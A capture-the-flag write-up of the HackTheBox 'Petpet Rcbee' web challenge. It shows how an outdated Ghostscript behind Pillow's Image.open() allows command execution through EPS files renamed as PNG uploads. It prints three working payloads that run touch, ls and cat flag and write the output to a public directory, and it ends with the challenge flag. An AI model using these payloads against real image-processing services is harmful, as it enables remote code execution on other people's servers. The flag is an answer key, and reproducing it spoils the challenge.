Dear readers,

Today’s post is on a web challenge on HackTheBox called Petpet Rcbee. It was created on 5th June 2021. It is a pretty short challenge so this post shouldn’t be too long. Let’s dive right into it.

Files provided

There are a number of files provided by the challenge which contais files needed to set up locally. There are CSS files, image files, JavaScript files, Python files, Docker setup files, etc. You may download the files here. Note that the catflag.eps, catflag.png, ls.eps, and ls.png are files I have created for the exploit. You may ignore them if you are setting up the server locally.

Outlook of the website

When we first go into the website, this is how the website looks like.

We can choose any image file (.png or .jpeg) to upload. Once the file is successfully uploaded, moving out the cursor over the current .gif image on the website of the website will cause it to be updated. Fig 2b shows the result of me uploading an image of my logo to the website where the website now displays a GIF of a hand petting my logo.

If we try to upload other file types, there will not be any changes to the website.

Analysis

Looking at the code. We will be able to notice that the backend of the website is running on Flask. Below shows the source code of main.py (located at challenge/application/main.py) which is running in the backend of the server showing Flask library is being used.

from flask import Flask
from application.blueprints.routes import web, api

app = Flask(__name__)
app.config.from_object('application.config.Config')

app.register_blueprint(web, url_prefix='/')
app.register_blueprint(api, url_prefix='/api')

@app.errorhandler(404)
def not_found(error):
    return {'error': 'Not Found'}, 404

If we take a look at util.py (located at challenge/application/util.py), we can see that the only file with extension that is .png, .jpg, or .jpeg is allowed.

ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])

def petpet(file):

    if not allowed_file(file.filename):
        return {'status': 'failed', 'message': 'Improper filename'}, 400

Since we are unable to upload other types of files, we are unable to upload a malicious __init__.py file which is commonly used for Remote Code Execution (RCE) via file upload on a server that uses Python for their backend. You may read more about that approach by ajinabraham.com here.

While looking at the source codes, I couldn’t find any vulnerability. Hence, I decided to try the least possible option that might occur which is finding a CVE vulnerability for the PIL library which is a wrapper for processing images. True enough, I found this source that talks about a past CVE for PIL via Ghostscript here. The vulnerability exists for Ghostscript that is before v9.24.

Looking at the dockerfile, we can see that Ghostscript v9.23 is used which means we can use the Proof-of-Concept (PoC) given. Below shows part of the section in the dockerfile that shows v9.23 is being used.

# Install Pillow component
RUN curl -L -O https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs923/ghostscript-9.23-linux-x86_64.tgz \
    && tar -xzf ghostscript-9.23-linux-x86_64.tgz \
    && mv ghostscript-9.23-linux-x86_64/gs-923-linux-x86_64 /usr/local/bin/gs && rm -rf /tmp/ghost*

Besides that, the vulnerability is triggered when Image.open() is executed. In the util.py, we can see that our uploaded image will undergo Image.open() thus is vulnerable to this CVE.

Crafting payload

Based on the PoC, we can make changes to the exploit. The PoC creates a shell and allows the creation of /tmp/got_rce file using the touch command shown below.

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/got_rce) currentdevice putdeviceprops

Therefore, we can create an Encapsulated Postscript (EPS) file to add the code above but change the command entered into the shell. We can send the output of the ls command into the /app/application/static/petpets directory where our usually uploaded image can be accessed (see Fig 4a and 4b). You may download the exploit code for ls here.

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%ls > /app/application/static/petpets/pwn.txt) currentdevice putdeviceprops

Once we have the script, we can change that EPS file into a PNG file by changing the file extension from .eps to .png and upload it into the server. Navigate your cursor to point it over the GIF file on the main page of the website. We can then view the GIF and change the URL to view our pwn.txt file. Fig 4c shows the result of the ls command executed on the working directory and printed in pwn.txt.

As we know the flag is located in the same directory, we can now print the content of the flag file into pwn.txt using the cat command shown below. You may download the exploit code here.

%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100

userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat flag > /app/application/static/petpets/pwn.txt) currentdevice putdeviceprops

Once you change the command, you can change the file extension again to PNG file and upload it by repeat that previous step again. The flag should be printed into pwn.txt after you uploaded the file.

Flag obtained

Flag: HTB{c0mfy_bzzzzz_rcb33s_v1b3s}

I hope this post has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my milk tea addiction. The link is here. 🙂